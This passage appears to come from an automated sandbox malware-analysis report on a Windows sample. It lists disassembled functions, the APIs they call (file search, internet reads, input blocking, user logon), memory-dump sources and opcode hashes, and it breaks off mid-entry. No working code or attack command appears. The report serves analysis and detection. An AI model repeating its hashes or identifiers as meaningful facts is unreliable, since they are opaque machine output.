                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                              • String ID:
                                                                                              • API String ID: 15083398-0
                                                                                              • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                              • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                              • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                              • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                              Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: U$\
                                                                                              • API String ID: 4104443479-100911408
                                                                                              • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                              • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                              • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                              • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                              Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 3541575487-0
                                                                                              • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                              • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                              • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                              • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                              Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                              • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                                              • String ID:
                                                                                              • API String ID: 48322524-0
                                                                                              • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                              • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                              • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                              • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                              Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                              • String ID:
                                                                                              • API String ID: 901099227-0
                                                                                              • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                              • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                              • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                              • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                              Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Proc
                                                                                              • String ID:
                                                                                              • API String ID: 2346855178-0
                                                                                              • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                              • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                              • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                              • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                              Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: BlockInput
                                                                                              • String ID:
                                                                                              • API String ID: 3456056419-0
                                                                                              • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                              • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                              • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                              • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                              Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: LogonUser
                                                                                              • String ID:
                                                                                              • API String ID: 1244722697-0
                                                                                              • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                              • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                              • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                              • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                              Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID:
                                                                                              • API String ID: 2645101109-0
                                                                                              • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                              • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                              • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                              • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                              Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                              • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                              • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                              • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                              Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: N@
                                                                                              • API String ID: 0-1509896676
                                                                                              • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                              • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                              • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                              • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                              Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                              • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                              • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                              • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                              Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                              • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                              • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                              • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                              Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                              • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                              • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                              • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                              Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                              • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                              • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                              • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                              Function 04739400 Relevance: .1, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                              • Instruction ID: 40dd91083b4d0e5f64814b52a90726d0ff4332c98778e09d09da4c3d75391f0d
                                                                                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                              • Instruction Fuzzy Hash: 9341B5B1D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB50
                                                                                              Function 047392F0 Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                              • Instruction ID: 9b0e54cccaac0feb62e114293f11873abcceb90e732115ce177d419c788bcec2
                                                                                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                              • Instruction Fuzzy Hash: 6A01A4B8A00209EFCB44DF99C5909AEF7F5FF48310F208599D909A7351E770AE41DB80
                                                                                              Function 04739290 Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
